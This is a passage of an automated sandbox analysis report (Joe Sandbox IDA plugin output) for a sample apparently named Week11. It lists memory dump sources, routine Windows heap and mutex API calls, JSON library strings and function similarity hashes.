                                • Instruction Fuzzy Hash: AA01A7A2E0014056E61477F6BCC569B23549BD0376B10C4BFFA0589253F728844197AD
                                APIs
                                Strings
                                • D, xrefs: 0044E65E, 0044E6C3
                                • in Json::Value::duplicateStringValue(): Failed to allocate string value buffer, xrefs: 0044E68A
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _malloc
                                • String ID: D$in Json::Value::duplicateStringValue(): Failed to allocate string value buffer
                                • API String ID: 1579825452-1789853658
                                • Opcode ID: 75298489d849f845ba64b3fc91c1800b282d06b8886ee4aea7138ed160373318
                                • Instruction ID: c6d8451d7cf46d9193f8aafad735d3d9bfb55c423160826813fa3bd8bb0dcf15
                                • Opcode Fuzzy Hash: 75298489d849f845ba64b3fc91c1800b282d06b8886ee4aea7138ed160373318
                                • Instruction Fuzzy Hash: A401C872905258ABD710DB59C901B9EBBECEB49720F10026FE414A33C1EB79990487E9
                                APIs
                                  • Part of subcall function 0047A200: GetProcessHeap.KERNEL32(1D1D1D8C), ref: 0047A228
                                • ReleaseMutex.KERNEL32(?), ref: 0047A47D
                                • CloseHandle.KERNEL32(?), ref: 0047A49F
                                  • Part of subcall function 0047A8A0: GetProcessHeap.KERNEL32(?,0047A492), ref: 0047A8A6
                                  • Part of subcall function 0047A8A0: HeapFree.KERNEL32(00000000,00000000,?), ref: 0047A8B4
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Heap$Process$CloseFreeHandleMutexRelease
                                • String ID: (bN
                                • API String ID: 3832489521-263236600
                                • Opcode ID: d957a6a7a796b828490e71499ce251828a244c3c8b724b0685df1eef20c7035f
                                • Instruction ID: 096040a672289b3e11b7f3a286a86e08f0e024de8603eaa531badf1606ead50a
                                • Opcode Fuzzy Hash: d957a6a7a796b828490e71499ce251828a244c3c8b724b0685df1eef20c7035f
                                • Instruction Fuzzy Hash: 06D01235405100DBC721AFA4994C6AE3634ABD4734F558399E4142B3A1CB7D98129B9F
                                APIs
                                  • Part of subcall function 0047A200: GetProcessHeap.KERNEL32(1D1D1D8C), ref: 0047A228
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0047A4FC
                                • HeapFree.KERNEL32(00000000), ref: 0047A4FF
                                • GetProcessHeap.KERNEL32(?), ref: 0047A51D
                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 0047A527
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Heap$Process$Free
                                • String ID:
                                • API String ID: 3168794593-0
                                • Opcode ID: 799aa3df361be9bd4b2d852b99a9f77535238c035179bec6a1d7b42f949e0c41
                                • Instruction ID: c2409097a47e11fdc18ddb454556df87e0a1a1e7dbbeb792cb94f8ddfad5f825
                                • Opcode Fuzzy Hash: 799aa3df361be9bd4b2d852b99a9f77535238c035179bec6a1d7b42f949e0c41
                                • Instruction Fuzzy Hash: 97F062B42002016AE6106BB69CC0F9B379CEB84754F05447AF504D7292DB28D911CEAE